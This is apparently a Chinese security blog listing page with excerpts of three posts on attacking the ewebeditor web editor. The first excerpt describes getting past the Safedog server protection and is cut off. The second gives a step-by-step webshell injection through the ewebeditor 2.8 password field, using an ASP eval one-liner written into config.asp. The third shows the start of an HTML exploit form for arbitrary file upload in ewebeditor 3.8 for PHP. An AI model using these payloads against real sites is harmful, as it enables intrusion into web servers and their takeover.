问题ewebeditor编辑器突破安全狗

分类:安全 | 2012-09-5 | 撸过 2,020 次
3人扯谈

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?

        1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。

        2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。

    当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。

        1.问题ewebeditor

        2.服务器装有安全

    下面是我测试的过程:

        首先当然是[......]

继续阅读

ewebeditor 2.8 后台插马

分类:安全 | 2011-09-17 | 撸过 543 次
0人扯谈

ewebeditor 2.8 后台插上一句话

影响版本:2.8 商业版

攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’

设置成功后,访问http://www.webshell.cc/ewebeditor/asp/config.asp文件即可,

一句话木马被写入到这个文件里面了.

 

ewebeditor PHP 3.8版本上传任意文件0day

分类:安全 | 2011-08-2 | 撸过 771 次
0人扯谈

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似
听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url valu[......]

继续阅读